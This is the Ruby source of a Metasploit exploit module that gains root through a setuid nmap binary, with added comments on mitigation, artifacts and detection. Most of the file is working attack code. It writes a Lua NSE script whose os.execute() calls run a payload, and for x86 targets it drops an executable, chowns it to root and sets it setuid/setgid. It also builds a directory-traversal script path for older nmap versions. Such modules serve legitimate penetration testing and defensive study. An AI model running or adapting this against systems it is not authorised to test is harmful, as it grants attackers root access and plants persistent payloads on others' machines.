Path: blob/master/modules/exploits/unix/local/setuid_nmap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation through a setuid nmap binary.
#
# nmap executes NSE scripts (Lua), and Lua's os.execute() runs a shell
# command. The module writes such a script under WritableDir and makes the
# setuid nmap load it with --script, so the command runs with nmap's
# privileges. 'PrependSetresuid' is enabled in DefaultOptions, presumably so
# the payload raises its real uid as well -- confirm against the payload code.
#
# Notes for defenders, all taken from the code below:
# * Mitigation: do not install nmap setuid; its own man page (quoted in the
#   Description) says so. `check` reports Safe whenever the configured binary
#   is absent or not setuid.
# * Artifacts: an 8-letter random `.nse` file and, for the x86 targets, an
#   `.elf` file that the script chowns to root:root and chmods 6700
#   (setuid + setgid, owner rwx), both in WritableDir (default /tmp). Both are
#   removed in the `ensure` clause of `exploit`.
# * Detection: nmap invoked as
#   `<Nmap> --script ../../../../../../../../../../<WritableDir>/<random>.nse -p80 localhost <ExtraArgs>`
#   -- the script path is rewritten to ten `../` segments followed by the
#   absolute path with its leading slash removed.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::File

  # Module metadata and options. Both paths are OptString (not OptPath)
  # because they refer to the *remote* filesystem.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Setuid Nmap Exploit',
        'Description' => %q{
          Nmap's man page mentions that "Nmap should never be installed with
          special privileges (e.g. suid root) for security reasons.." and
          specifically avoids making any of its binaries setuid during
          installation. Nevertheless, administrators sometimes feel the need
          to do insecure things. This module abuses a setuid nmap binary by
          writing out a lua nse script containing a call to os.execute().

          Note that modern interpreters will refuse to run scripts on the
          command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby}
          payloads will most likely not work.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'egypt' ],
        'DisclosureDate' => '2012-07-19',
        'Platform' => %w[bsd linux unix],
        'Arch' => [ ARCH_CMD, ARCH_X86 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [
          [ 'Command payload', { 'Arch' => ARCH_CMD } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
          [ 'BSD x86', { 'Arch' => ARCH_X86 } ],
        ],
        # WfsDelay: the Lua script backgrounds the payload with '&', so the
        # session may arrive shortly after cmd_exec returns.
        'DefaultOptions' => { 'PrependSetresuid' => true, 'WfsDelay' => 2 },
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
        },
        'DefaultTarget' => 0
      )
    )
    register_options([
      # These are not OptPath because it's a *remote* path
      OptString.new('Nmap', [ true, 'Path to setuid nmap executable', '/usr/bin/nmap' ]),
      OptString.new('ExtraArgs', [ false, 'Extra arguments to pass to Nmap (e.g. --datadir)', '' ]),
    ])
    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  # Remote path to the nmap binary (the 'Nmap' datastore option).
  def nmap
    datastore['Nmap']
  end

  # Safe unless the configured nmap path exists on the target and is setuid.
  # file?/setuid? are the remote-file helpers mixed in above (Msf::Post::File).
  def check
    return CheckCode::Safe("#{nmap} file not found") unless file? nmap
    return CheckCode::Safe("#{nmap} is not setuid") unless setuid? nmap

    CheckCode::Vulnerable("#{nmap} is setuid")
  end

  # Builds the NSE script (dropping an ELF first for the x86 targets), writes
  # it under WritableDir, runs it through nmap and removes the dropped files.
  def exploit
    if (target.arch.include? ARCH_CMD)
      # Prefix every '$' and '"' in the encoded command with a backslash before
      # embedding it in the double-quoted Lua string; '&' backgrounds it so
      # nmap itself can finish.
      p = payload.encoded.gsub(/([$"])/) { |_m| "\\#{Regexp.last_match(1)}" }
      evil_lua = %{ os.execute("#{p} &") }
    else
      # Binary payload: the script makes the dropped ELF root-owned and
      # setuid/setgid (6700) before running it, then deletes it.
      exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(8)}.elf"
      print_status("Dropping executable #{exe_file}")
      write_file(exe_file, generate_payload_exe)
      evil_lua = %{
        os.execute("chown root:root #{exe_file}");
        os.execute("chmod 6700 #{exe_file}");
        os.execute("#{exe_file} &");
        os.execute("rm -f #{exe_file}");
      }
    end
    lua_file = "#{datastore['WritableDir']}/#{rand_text_alpha(8)}.nse"
    print_status("Dropping lua #{lua_file}")
    write_file(lua_file, evil_lua)

    print_status("Running #{lua_file} with Nmap")

    scriptname = lua_file
    # lua_file[0, 1] is its first character, i.e. this tests for an absolute path.
    if (lua_file[0, 1] == '/')
      # Versions before 4.51BETA (December 2007) only accept relative paths for script names
      # Figure 10 up-directory traversals are enough.
      scriptname = ('../' * 10) + lua_file[1..]
    end

    begin
      # Versions before 4.75 (August 2008) will not run scripts without a port scan
      # ExtraArgs is appended verbatim (unquoted) to the command line.
      result = cmd_exec "#{nmap} --script #{scriptname} -p80 localhost #{datastore['ExtraArgs']}"
      vprint_status(result)
    ensure
      # NOTE(review): exe_file is only assigned in the else branch above, so on
      # the command-payload path rm_f receives nil as its second argument.
      rm_f(lua_file, exe_file)
    end
  end
end